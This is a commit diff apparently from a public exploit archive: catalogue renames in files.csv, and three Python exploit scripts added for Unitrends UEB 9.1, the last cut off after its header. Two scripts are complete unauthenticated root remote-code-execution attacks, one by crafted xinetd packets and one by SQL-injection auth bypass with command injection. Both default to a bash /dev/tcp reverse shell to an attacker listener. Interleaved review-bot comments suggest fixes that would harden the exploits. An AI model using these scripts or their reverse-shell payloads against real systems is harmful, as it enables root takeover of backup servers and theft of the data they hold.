DB: 2017-10-07
4 new exploits

Konqueror 3.5.9 - (font color) Remote Crash
Konqueror 3.5.9 - 'font color' Remote Crash

Microsoft Windows 10 x64 RS2 - 'win32kfull!bFill' Pool Overflow

hammer software metagauge 1.0.0.17 - Directory Traversal
Hammer Software MetaGauge 1.0.0.17 - Directory Traversal

Billion Router 7700NR4 - Remote Command Execution
Billion 7700NR4 Router - Remote Command Execution

Unitrends UEB 9.1 - 'Unitrends bpserverd' Remote Command Execution
Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution

else if CMS 0.6 - Multiple Vulnerabilities
Else If CMS 0.6 - Multiple Vulnerabilities

Picturesolution 2.1 - 'config.php path' Remote File Inclusion
Picturesolution 2.1 - 'config.php' 'path' Remote File Inclusion

tsmim Lessons Library - 'show.php' SQL Injection
Tsmim Lessons Library - 'show.php' SQL Injection

Simple Machines Forum (SMF) 1.1.6 - POST Filter Security Bypass
Simple Machines Forum (SMF) 1.1.6 - 'POST' Filter Security Bypass

PHP-Fusion v7.02.07 - Blind SQL Injection
PHP-Fusion 7.02.07 - Blind SQL Injection

ZTE ZXHN H108N - Unauthenticated Config Download
ZTE ZXHN H108N Router - Unauthenticated Config Download

Unitrends UEB 9.1 - Privilege Escalation
parent 9ee6a8e2ee
commit bfb5d80e10
5 changed files with 501 additions and 9 deletions

files.csv (22 lines changed)
@ -820,7 +820,7 @@ id,file,description,date,author,platform,type,port
|
|||
6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death)",2008-10-04,Defsanguje,windows,dos,0
|
||||
6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - Invalid Bitmap Header Parsing Crash",2008-10-05,suN8Hclf,windows,dos,0
|
||||
6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - '.BMP' Image Crash",2008-10-05,suN8Hclf,windows,dos,0
|
||||
6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - (font color) Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0
|
||||
6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - 'font color' Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0
|
||||
6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 - (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0
|
||||
6716,platforms/windows/dos/6716.pl,"Microsoft Windows - GDI+ (PoC) (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0
|
||||
6717,platforms/windows/dos/6717.py,"WinFTP Server 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0
|
||||
|
@ -9279,6 +9279,7 @@ id,file,description,date,author,platform,type,port
|
|||
42937,platforms/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,linux,local,0
|
||||
42948,platforms/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",osx,local,0
|
||||
42951,platforms/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,windows,local,0
|
||||
42960,platforms/win_x86-64/local/42960.txt,"Microsoft Windows 10 x64 RS2 - 'win32kfull!bFill' Pool Overflow",2017-10-06,siberas,win_x86-64,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -10312,7 +10313,7 @@ id,file,description,date,author,platform,type,port
|
|||
6656,platforms/windows/remote/6656.txt,"Microsoft Windows - GDI (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0
|
||||
6661,platforms/windows/remote/6661.txt,"Serv-U FTP Server 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
|
||||
6666,platforms/windows/remote/6666.pl,"mIRC 6.34 - Remote Buffer Overflow",2008-10-04,SkD,windows,remote,0
|
||||
6686,platforms/windows/remote/6686.txt,"hammer software metagauge 1.0.0.17 - Directory Traversal",2008-10-06,"Brad Antoniewicz",windows,remote,0
|
||||
6686,platforms/windows/remote/6686.txt,"Hammer Software MetaGauge 1.0.0.17 - Directory Traversal",2008-10-06,"Brad Antoniewicz",windows,remote,0
|
||||
6690,platforms/windows/remote/6690.html,"Skype extension for Firefox Beta 2.2.0.95 - Clipboard Writing",2008-10-07,irk4z,windows,remote,0
|
||||
6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload (PoC)",2008-10-08,Nine:Situations:Group,windows,remote,0
|
||||
6750,platforms/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",hardware,remote,0
|
||||
|
@ -15646,7 +15647,7 @@ id,file,description,date,author,platform,type,port
|
|||
40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40458,platforms/windows/remote/40458.py,"Disk Sorter Enterprise 9.0.24 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
|
||||
40472,platforms/hardware/remote/40472.py,"Billion 7700NR4 Router - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
|
||||
40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
|
||||
40491,platforms/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,multiple,remote,0
|
||||
40507,platforms/linux/remote/40507.py,"Subversion 1.6.6/1.6.12 - Code Execution",2016-10-12,GlacierZ0ne,linux,remote,0
|
||||
|
@ -15887,9 +15888,11 @@ id,file,description,date,author,platform,type,port
|
|||
42888,platforms/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote,0
|
||||
42891,platforms/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution",2017-09-28,hyp3rlinx,windows,remote,0
|
||||
42928,platforms/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Buffer Overflow",2017-09-30,"Owais Mehtab",windows,remote,0
|
||||
42957,platforms/linux/remote/42957.py,"Unitrends UEB 9.1 - 'Unitrends bpserverd' Remote Command Execution",2017-08-08,"Jared Arave",linux,remote,0
|
||||
42938,platforms/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,linux,remote,0
|
||||
42949,platforms/linux/remote/42949.txt,"UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution",2017-10-02,agix,linux,remote,0
|
||||
42952,platforms/windows/remote/42952.py,"ERS Data System 1.8.1 - Java Deserialization",2017-09-21,"West Shepherd",windows,remote,0
|
||||
42958,platforms/linux/remote/42958.py,"Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution",2017-08-08,"Jared Arave",linux,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
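Review bot: the new 42957 row is inserted between 42928 and 42938, which breaks the ascending id order the surrounding rows follow (42938, 42949, 42952, 42958); move it directly before the 42958 row so the two Unitrends remote entries sit together and the file stays sorted.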
@ -18717,9 +18720,9 @@ id,file,description,date,author,platform,type,port
|
|||
4485,platforms/php/webapps/4485.txt,"Trionic Cite CMS 1.2rev9 - Remote File Inclusion",2007-10-05,GoLd_M,php,webapps,0
|
||||
4486,platforms/asp/webapps/4486.txt,"Furkan Tastan Blog - SQL Injection",2007-10-05,CyberGhost,asp,webapps,0
|
||||
4489,platforms/php/webapps/4489.txt,"Joomla! Component panoramic 1.0 - Remote File Inclusion",2007-10-06,NoGe,php,webapps,0
|
||||
4490,platforms/php/webapps/4490.txt,"else if CMS 0.6 - Multiple Vulnerabilities",2007-10-06,"HACKERS PAL",php,webapps,0
|
||||
4490,platforms/php/webapps/4490.txt,"Else If CMS 0.6 - Multiple Vulnerabilities",2007-10-06,"HACKERS PAL",php,webapps,0
|
||||
4491,platforms/php/webapps/4491.php,"CMS Creamotion - 'securite.php' Remote File Inclusion",2007-10-06,"HACKERS PAL",php,webapps,0
|
||||
4492,platforms/php/webapps/4492.txt,"Picturesolution 2.1 - 'config.php path' Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0
|
||||
4492,platforms/php/webapps/4492.txt,"Picturesolution 2.1 - 'config.php' 'path' Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0
|
||||
4493,platforms/php/webapps/4493.txt,"SkaDate Online 5.0/6.0 - Remote File Disclosure",2007-10-06,SnIpEr_SA,php,webapps,0
|
||||
4494,platforms/php/webapps/4494.txt,"Verlihub Control Panel 1.7.x - Local File Inclusion",2007-10-07,TEAMELITE,php,webapps,0
|
||||
4495,platforms/php/webapps/4495.txt,"idmos-phoenix CMS - 'aural.php' Remote File Inclusion",2007-10-07,"HACKERS PAL",php,webapps,0
|
||||
|
@ -25740,7 +25743,7 @@ id,file,description,date,author,platform,type,port
|
|||
17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel - Admin Authentication Bypass",2011-10-04,Jasman,php,webapps,0
|
||||
17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 - File Disclosure",2011-10-04,bd0rk,php,webapps,0
|
||||
18033,platforms/php/webapps/18033.txt,"Joomla! Component 'com_yjcontactus' - Local File Inclusion",2011-10-25,MeGo,php,webapps,0
|
||||
17935,platforms/php/webapps/17935.txt,"tsmim Lessons Library - 'show.php' SQL Injection",2011-10-06,M.Jock3R,php,webapps,0
|
||||
17935,platforms/php/webapps/17935.txt,"Tsmim Lessons Library - 'show.php' SQL Injection",2011-10-06,M.Jock3R,php,webapps,0
|
||||
17937,platforms/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,php,webapps,0
|
||||
17938,platforms/php/webapps/17938.txt,"EFront 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps,0
|
||||
17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution (Metasploit)",2011-10-07,Metasploit,linux,webapps,0
|
||||
|
@ -33116,7 +33119,7 @@ id,file,description,date,author,platform,type,port
|
|||
32455,platforms/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",php,webapps,0
|
||||
32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Parameter Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0
|
||||
32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0
|
||||
32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - POST Filter Security Bypass",2008-10-06,WHK,php,webapps,0
|
||||
32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - 'POST' Filter Security Bypass",2008-10-06,WHK,php,webapps,0
|
||||
32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
|
||||
32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php' File Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
|
||||
32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0
|
||||
|
@ -36647,10 +36650,10 @@ id,file,description,date,author,platform,type,port
|
|||
38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus 9.1 build 9110 - Directory Traversal",2015-10-05,xistence,jsp,webapps,8080
|
||||
38537,platforms/php/webapps/38537.txt,"WordPress Plugin ADIF Log Search Widget - 'logbook_search.php' Cross-Site Scripting",2013-05-27,k3170makan,php,webapps,0
|
||||
38400,platforms/php/webapps/38400.txt,"Alienvault Open Source SIEM (OSSIM) 4.3 - Cross-Site Request Forgery",2015-10-05,"MohamadReza Mohajerani",php,webapps,0
|
||||
38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
|
||||
38406,platforms/php/webapps/38406.txt,"PHP-Fusion 7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
|
||||
38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0
|
||||
38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0
|
||||
38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
|
||||
38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Router - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
|
||||
38410,platforms/php/webapps/38410.txt,"WordPress Plugin Banners Lite - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0
|
||||
38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - Cross-Site Request Forgery",2015-10-07,hyp3rlinx,python,webapps,0
|
||||
38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0
|
||||
|
@ -38654,3 +38657,4 @@ id,file,description,date,author,platform,type,port
|
|||
42953,platforms/windows/webapps/42953.txt,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution",2017-09-20,xxlegend,windows,webapps,0
|
||||
42954,platforms/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",php,webapps,0
|
||||
42956,platforms/hardware/webapps/42956.txt,"NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",hardware,webapps,0
|
||||
42959,platforms/php/webapps/42959.py,"Unitrends UEB 9.1 - Privilege Escalation",2017-08-08,"Jared Arave",php,webapps,0
|
||||
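Review bot: the description for 42959, "Unitrends UEB 9.1 - Privilege Escalation", does not match the title the script itself carries, "Authenticated lowpriv RCE for Unitrends UEB 9.1"; an authenticated remote code execution wording would describe the entry more accurately. Also check that platform `php` under `platforms/php/webapps/` is intended: the sibling Unitrends scripts 42957 and 42958 added in this same commit are filed as `linux` under `platforms/linux/remote/`, and all three are Python scripts against the same appliance.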
platforms/linux/remote/42957.py (executable file, 166 lines added)
@ -0,0 +1,166 @@
|
|||
# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1
|
||||
# Date: 08/08/2017
|
||||
# Exploit Authors: Jared Arave, Cale Smith, Benny Husted
|
||||
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
|
||||
# Vendor Homepage: https://www.unitrends.com/
|
||||
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
|
||||
# Version: 9.1
|
||||
# Tested on: CentOS6
|
||||
# CVE: CVE-2017-12477
|
||||
|
||||
import socket
|
||||
import binascii
|
||||
import struct
|
||||
import time
|
||||
import sys
|
||||
from optparse import OptionParser
|
||||
|
||||
print """
|
||||
###############################################################################
|
||||
Unauthenticated root RCE for Unitrends UEB 9.1
|
||||
Tested against appliance versions:
|
||||
[+] 9.1.0-2.201611302120.CentOS6
|
||||
|
||||
This exploit uses roughly the same process to gain root execution
|
||||
as does the apache user on the Unitrends appliance. The process is
|
||||
something like this:
|
||||
|
||||
1. Connect to xinetd process (it's usually running on port 1743)
|
||||
2. This process will send something like: '?A,Connect36092'
|
||||
3. Initiate a second connection to the port specified
|
||||
in the packet from xinetd (36092 in this example)
|
||||
4. send a specially crafted packet to xinetd, containing the
|
||||
command to be executed as root
|
||||
5. Receive command output from the connection to port 36092
|
||||
6. Close both connections
|
||||
|
||||
NB: Even if you don't strictly need output from your command,
|
||||
The second connection must still be made for the command
|
||||
to be executed at all.
|
||||
###############################################################################
|
||||
"""
|
||||
|
||||
# Parse command line args:
|
||||
usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\
|
||||
" %prog -r <appliance_ip> -c 'touch /tmp/foooooooooooo'"
|
||||
|
||||
parser = OptionParser(usage=usage)
|
||||
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
|
||||
help="Target host w/ UNITRENDS UEB installation")
|
||||
parser.add_option("-l", '--LHOST', dest='lhost', action="store",
|
||||
help="Host listening for reverse shell connection")
|
||||
parser.add_option("-p", '--LPORT', dest='lport', action="store",
|
||||
help="Port on which nc is listening")
|
||||
parser.add_option("-c", '--cmd', dest='cmd', action="store",
|
||||
help="Run a custom command, no reverse shell for you.")
|
||||
parser.add_option("-x", '--xinetd', dest='xinetd', action="store",
|
||||
type="int", default=1743,
|
||||
help="port on which xinetd is running (default: 1743)")
|
||||
|
||||
(options, args) = parser.parse_args()
|
||||
|
||||
if options.cmd:
|
||||
if (options.lhost or options.lport):
|
||||
parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mutually exclusive.\n")
|
||||
|
||||
elif not options.rhost:
|
||||
parser.error("[!] No remote host specified.\n")
|
||||
|
||||
elif options.rhost is None or options.lhost is None or options.lport is None:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
RHOST = options.rhost
|
||||
LHOST = options.lhost
|
||||
LPORT = options.lport
|
||||
XINETDPORT = options.xinetd
|
||||
|
||||
if options.cmd:
|
||||
cmd = options.cmd
|
||||
else:
|
||||
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)
|
||||
|
||||
def recv_timeout(the_socket,timeout=2):
|
||||
the_socket.setblocking(0)
|
||||
total_data=[];data='';begin=time.time()
|
||||
while 1:
|
||||
#if you got some data, then break after wait sec
|
||||
if total_data and time.time()-begin>timeout:
|
||||
break
|
||||
#if you got no data at all, wait a little longer
|
||||
elif time.time()-begin>timeout*2:
|
||||
break
|
||||
try:
|
||||
data=the_socket.recv(8192)
|
||||
if data:
|
||||
total_data.append(data)
|
||||
begin=time.time()
|
||||
else:
|
||||
time.sleep(0.1)
|
||||
except:
|
||||
pass
|
||||
return ''.join(total_data)
|
||||
|
||||
print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))
|
||||
|
||||
try:
|
||||
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s1.connect((RHOST,XINETDPORT))
|
||||
except:
|
||||
print "[!] Failed to connect!"
|
||||
exit()
|
||||
|
||||
data = s1.recv(4096)
|
||||
bpd_port = int(data[-8:-3])
|
||||
|
||||
print "[+] Connected! Cmd output will come back on {}:{}".format(RHOST, str(bpd_port))
|
||||
print "[+] Connecting to bpdserverd on {}:{}".format(RHOST, str(bpd_port))
|
||||
|
||||
try:
|
||||
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s2.connect((RHOST, bpd_port))
|
||||
except:
|
||||
print "[!] Failed to connect!"
|
||||
s1.close()
|
||||
exit()
|
||||
|
||||
print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT))
|
||||
print "[+] '{0}'".format(cmd)
|
||||
|
||||
if (len(cmd) > 240):
|
||||
print "[!] This command is long; this might not work."
|
||||
print "[!] Maybe try a shorter command..."
|
||||
|
||||
cmd_len = chr(len(cmd) + 3)
|
||||
packet_len = chr(len(cmd) + 23)
|
||||
|
||||
packet = '\xa5\x52\x00\x2d'
|
||||
packet += '\x00' * 3
|
||||
packet += packet_len
|
||||
packet += '\x00' * 3
|
||||
packet += '\x01'
|
||||
packet += '\x00' * 3
|
||||
packet += '\x4c'
|
||||
packet += '\x00' * 3
|
||||
packet += cmd_len
|
||||
packet += cmd
|
||||
packet += '\x00' * 3
|
||||
|
||||
s1.send(packet)
|
||||
|
||||
print "[+] cmd packet sent!"
|
||||
print "[+] Waiting for response from {0}:{1}".format(RHOST,str(bpd_port))
|
||||
|
||||
data = recv_timeout(s2)
|
||||
|
||||
print "[+] Here's the output -> \n\n"
|
||||
|
||||
print data
|
||||
|
||||
print "[+] Closing ports, exiting...."
|
||||
|
||||
s1.close()
|
||||
s2.close()
|
||||
|
||||
# 3. Solution:
|
||||
# Update to Unitrends UEB 10
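Review bot: `bpd_port = int(data[-8:-3])` hard-codes the position of the port inside the xinetd banner, yet the comment block above only says the banner looks "something like" `?A,Connect36092`; a banner of a different length, or an empty read when the service closes the connection, raises a bare ValueError with no useful message. Parse the digits following `Connect` and fail with a clear error if none are present. Related: `packet_len = chr(len(cmd) + 23)` raises ValueError as soon as `len(cmd)` exceeds 232, so the `len(cmd) > 240` warning a few lines later can never be reached; either cap the command length explicitly or emit the length fields with `struct.pack` (imported but never used). Minor: the bare `except: pass` in `recv_timeout` also swallows real socket errors, and the `# 3. Solution:` footer refers to sections 1 and 2 that this file does not contain.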
platforms/linux/remote/42958.py (executable file, 116 lines added)
@ -0,0 +1,116 @@
|
|||
# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1
|
||||
# Date: 08/08/2017
|
||||
# Exploit Authors: Cale Smith, Benny Husted, Jared Arave
|
||||
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
|
||||
# Vendor Homepage: https://www.unitrends.com/
|
||||
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
|
||||
# Version: 9.1
|
||||
# Tested on: CentOS6
|
||||
# CVE: CVE-2017-12478
|
||||
|
||||
import httplib
|
||||
import urllib
|
||||
import ssl
|
||||
import random
|
||||
import sys
|
||||
import base64
|
||||
import string
|
||||
from optparse import OptionParser
|
||||
|
||||
# Print some helpful words:
|
||||
print """
|
||||
###############################################################################
|
||||
Unauthenticated root RCE for Unitrends UEB 9.1
|
||||
Tested against appliance versions:
|
||||
[+] 9.1.0-2.201611302120.CentOS6
|
||||
|
||||
This exploit leverages a sqli vulnerability for authentication bypass,
|
||||
together with command injection for subsequent root RCE.
|
||||
|
||||
To use the exploit as written, make sure you're running a reverse
|
||||
shell listener somewhere, using a command like:
|
||||
|
||||
$ nc -nlvp 1234
|
||||
|
||||
Then, just specify the ip and port of the remote listener in the
|
||||
exploit command. Alternatively, modify this exploit to contain a
|
||||
command of your choosing by modifying the 'cmd' variable below.
|
||||
###############################################################################
|
||||
"""
|
||||
|
||||
# Disable SSL Cert validation
|
||||
if hasattr(ssl, '_create_unverified_context'):
|
||||
ssl._create_default_https_context = ssl._create_unverified_context
|
||||
|
||||
# Parse command line args:
|
||||
usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\
|
||||
" %prog -c 'touch /tmp/foooooooooooo'"
|
||||
|
||||
parser = OptionParser(usage=usage)
|
||||
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
|
||||
help="Target host w/ UNITRENDS UEB installation")
|
||||
parser.add_option("-l", '--LHOST', dest='lhost', action="store",
|
||||
help="Host listening for reverse shell connection")
|
||||
parser.add_option("-p", '--LPORT', dest='lport', action="store",
|
||||
help="Port on which nc is listening")
|
||||
parser.add_option("-c", '--cmd', dest='cmd', action="store",
|
||||
help="Run a custom command, no reverse shell for you.")
|
||||
|
||||
(options, args) = parser.parse_args()
|
||||
|
||||
if options.cmd:
|
||||
if (options.lhost or options.lport):
|
||||
parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mututally exclusive.\n")
|
||||
|
||||
elif not options.rhost:
|
||||
parser.error("[!] No remote host specified.\n")
|
||||
|
||||
elif options.rhost is None or options.lhost is None or options.lport is None:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
RHOST = options.rhost
|
||||
LHOST = options.lhost
|
||||
LPORT = options.lport
|
||||
if options.cmd:
|
||||
cmd = options.cmd
|
||||
else:
|
||||
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)
|
||||
|
||||
url = '/api/storage/'
|
||||
|
||||
# Here, a SQLi string overrides the uuid, providing auth bypass.
|
||||
# We'll need to base64 encode before sending...
|
||||
auth = base64.b64encode("v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0")
|
||||
|
||||
params = urllib.urlencode({'auth' : auth})
|
||||
|
||||
params = """{{"type":4,"name":"aaaaaaaa","usage":"archive","properties":{{"username":"km","password":"km","port":"445","hostname":"asdf.com","protocol":"cifs","share_name":"`{0}`"}}}}""".format(cmd)
|
||||
|
||||
headers = {'Host' : RHOST,
|
||||
'Content-Type' : 'application/json',
|
||||
'X-Requested-With' : 'XMLHttpRequest',
|
||||
'AuthToken' : auth }
|
||||
|
||||
# Establish an HTTPS connection and send the payload.
|
||||
conn = httplib.HTTPSConnection(RHOST, 443)
|
||||
conn.set_debuglevel(1)
|
||||
|
||||
print """
|
||||
[+] Sending payload to remote host [https://{0}]
|
||||
[+] Here's some debug info:
|
||||
""".format(RHOST)
|
||||
|
||||
conn.request("POST", url, params, headers=headers)
|
||||
r1 = conn.getresponse()
|
||||
|
||||
print ""
|
||||
print "[+] Request sent. Maybe your command was executed?"
|
||||
print ""
|
||||
|
||||
# Print response, for debug purposes.
|
||||
print r1.status, r1.reason
|
||||
print r1.read()
|
||||
|
||||
# 3. Solution:
|
||||
# Update to Unitrends UEB 10
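Review bot: `params = urllib.urlencode({'auth' : auth})` is dead code, overwritten two lines later by the JSON body, and `random` and `string` are imported but never used; drop all three. The second form in the usage string (`%prog -c 'touch /tmp/foooooooooooo'`) omits `-r <appliance_ip>`, which the argument check below requires, so it should read like the corresponding line in 42957.py. The script also prints "Maybe your command was executed?" before looking at `r1.status`; print the status first and make the success message conditional on it. Typo in the parser error: "mututally".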
platforms/php/webapps/42959.py (executable file, 189 lines added)
@ -0,0 +1,189 @@
|
|||
# Exploit Title: Authenticated lowpriv RCE for Unitrends UEB 9.1
|
||||
# Date: 08/08/2017
|
||||
# Exploit Authors: Benny Husted, Jared Arave, Cale Smith
|
||||
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
|
||||
# Vendor Homepage: https://www.unitrends.com/
|
||||
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
|
||||
# Version: 9.1
|
||||
# Tested on: CentOS6
|
||||
# CVE: CVE-2017-12479
|
||||
|
||||
import httplib
|
||||
import urllib
|
||||
import ssl
|
||||
import sys
|
||||
import base64
|
||||
import random
|
||||
import time
|
||||
import string
|
||||
import json
|
||||
from optparse import OptionParser
|
||||
|
||||
# Print some helpful words:
|
||||
print """
|
||||
###############################################################################
|
||||
Authenticated lowpriv RCE for Unitrends UEB 9.1
|
||||
Tested against appliance versions:
|
||||
[+] 9.1.0-2.201611302120.CentOS6
|
||||
|
||||
This exploit utilizes some issues in UEB9 session handling to place a
|
||||
php exec one liner in the webroot of the appliance.
|
||||
|
||||
Session tokens looks like this:
|
||||
|
||||
djA6NmM0ZWMzYTEtZmYwYi00MTIxLTk3YzYtMjQzODljM2EyNjY1OjE6L3Vzci9icC9sb2dzLmRpci9ndWlfcm9vdC5sb2c6MA==
|
||||
|
||||
and decodes to this:
|
||||
LOG_LVL ----,
|
||||
v --- UUID ----------------------- v v -- LOG_DIR -----------v v
|
||||
v0:6c4ec3a1-ff0b-4121-97c6-24389c3a2665:1:/usr/bp/logs.dir/gui_root.log:0
|
||||
|
||||
The general steps that are followed by this poc are:
|
||||
|
||||
1. Authenticate as a low priv user and receive an auth token.
|
||||
2. Modify the LOG_DIR field to point to a directory in the web root
|
||||
with apache user write access, and make a request to an arbitrary resource.
|
||||
This should touch a new file at the desired location.
|
||||
3. Replace the UUID token in this auth token with a php shell_exec on liner,
|
||||
and modify the LOG_LVL parameter to a value of 5, which will ensure
|
||||
that the UUID is reflected into the log file.
|
||||
4. Issue a final request, to generate a shell.php file with a single shell_exec.
|
||||
This step is not strictly necessary.
|
||||
###############################################################################
|
||||
"""
|
||||
|
||||
# Disable SSL Cert validation
|
||||
if hasattr(ssl, '_create_unverified_context'):
|
||||
ssl._create_default_https_context = ssl._create_unverified_context
